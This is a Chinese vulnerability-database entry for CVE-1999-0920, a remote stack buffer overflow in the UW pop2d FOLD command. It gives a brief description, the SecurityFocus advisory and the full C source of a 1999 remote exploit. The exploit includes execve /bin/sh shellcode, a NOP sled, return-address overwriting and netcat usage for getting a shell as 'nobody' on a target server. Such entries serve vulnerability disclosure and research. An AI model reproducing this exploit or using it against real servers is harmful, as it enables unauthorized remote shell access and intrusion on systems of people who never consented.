UW pop2d FOLD命令远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105462 漏洞类型 边界条件错误
发布时间 1999-05-26 更新时间 2005-05-02
CVE编号 CVE-1999-0920 CNNVD-ID CNNVD-199905-048
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199905-048
|漏洞详情
pop2d是UniversityofWashington实现的一个开放源码的POP服务器。pop2d4.4及以前版本存在一个缓冲区溢出漏洞,恶意的远程攻击者可以利用该漏洞获得主机的"nobody"用户权限。pop2和pop3服务器支持"anonymousproxy",远程用户可以用这个指令打开其它有合法账号服务器的IMAPmailbox。登陆以后,FOLD命令的一个参数会引起基于堆栈的缓冲溢出。
|漏洞EXP
source: http://www.securityfocus.com/bid/283/info

A buffer overflow vulnerability in pop2d version 4.4 or earlier allow malicious remote users to obtain access to the "nobody" user account.

The pop2 and pop3 servers support the concept of an "anonymous proxy", whereby a remote user connecting to the server can instruct it to open an IMAP mailbox on some other saver they have a valid account on. In this state the pop2 server runs under the "nobody" user id.

Once logged on, issuing a FOLD command with an argument of about 1000 bytes will cause a stack based buffer overflow. 

/*
 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 *
 * by c0nd0r <condor@sekure.org>
 *
 *  (read the instructions below)
 *
 *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
 *            also to #uground (irc.brasnet.org) and #SDI (efnet),
 *            guys at el8.org, toxyn.org, pulhas.org
 *
 *  Sincere Apologizes: duke (for the mistake we made with the wu-expl),
 *                     your code rocks.
 *
 *  Usage:
 *
 *    SDI-pop2 <imap_server> <user> <pass> [offset]
 *
 *   where  imap_server = IMAP server at your box (or other place as well)
 *          user = any account at your box
 *          pass = the account's password
 *          offset = 0 is default -- increase if it's necessary.
 *
 *  Example: (netcat rocks)
 *
 *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *
 *  ----------------------------------------------------------------
 *  HOWTO-exploit:
 *
 *   In order to gain remote access as user nobody, you should set
 *   an IMAP server at your box (just edit the inetd.conf) or at
 *   any other machine which you have an account.
 *
 *   During the anonymous_login() function, the ipop2d will set the
 *   uid to user nobody, so you are not going to get a rootshell.
 *  ----------------------------------------------------------------
 *
 *  We do NOT take any responsability for the consequences of using
 *  this code -- you've been warned! don't be a script k1dd13!
 *
 */


#include <stdio.h>

/*
 *  (shellcode)
 * 
 *       jmp   0x1f
 *       popl  %esi
 *       movl  %esi,0x8(%esi)
 *       xorl  %eax,%eax
 *       movb  %eax,0x7(%esi)
 *       movl  %eax,0xc(%esi)
 *       movb  $0xb,%al
 *       movl  %esi,%ebx
 *       leal  0x8(%esi),%ecx
 *       leal  0xc(%esi),%edx
 *       int   $0x80
 *       xorl  %ebx,%ebx
 *       movl  %ebx,%eax
 *       inc   %eax
 *       int   $0x80
 *       call  -0x24
 *       .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org
 */

char c0d3[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
 

main (int argc, char *argv[] ) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 char host[255], user[255], pass[255];
 int bsize=986;
 
 if ( argc < 4) {
  printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  exit (0);
 }
  
 snprintf ( host, sizeof(host), "%s", argv[1]);
 snprintf ( user, sizeof(user), "%s", argv[2]);
 snprintf ( pass, sizeof(pass), "%s", argv[3]);
 
 if ( argc > 4) offset = atoi ( argv[4]);
 /* gimme the ret + offset */
 addr = 0xbffff3c0 + offset; 
 fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
 
 /* calculation of the return address position */
 bsize -= strlen ( host);
 
 for ( x = 0; x < bsize-strlen(c0d3); x++)
  buf[x] = 0x90;
 
 for ( y = 0; y < strlen(c0d3); x++, y++)
  buf[x] = c0d3[y]; 
 
 for (  ; x < 1012; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }
        
 sleep (1);
 printf ( "HELO %s:%s %s\r\n", host, user, pass);
 sleep (1);
 printf ( "FOLD %s\r\n", buf);

}
|参考资料

来源:BID
名称:283
链接:http://www.securityfocus.com/bid/283
来源:NSFOCUS
名称:3555
链接:http://www.nsfocus.net/vulndb/3555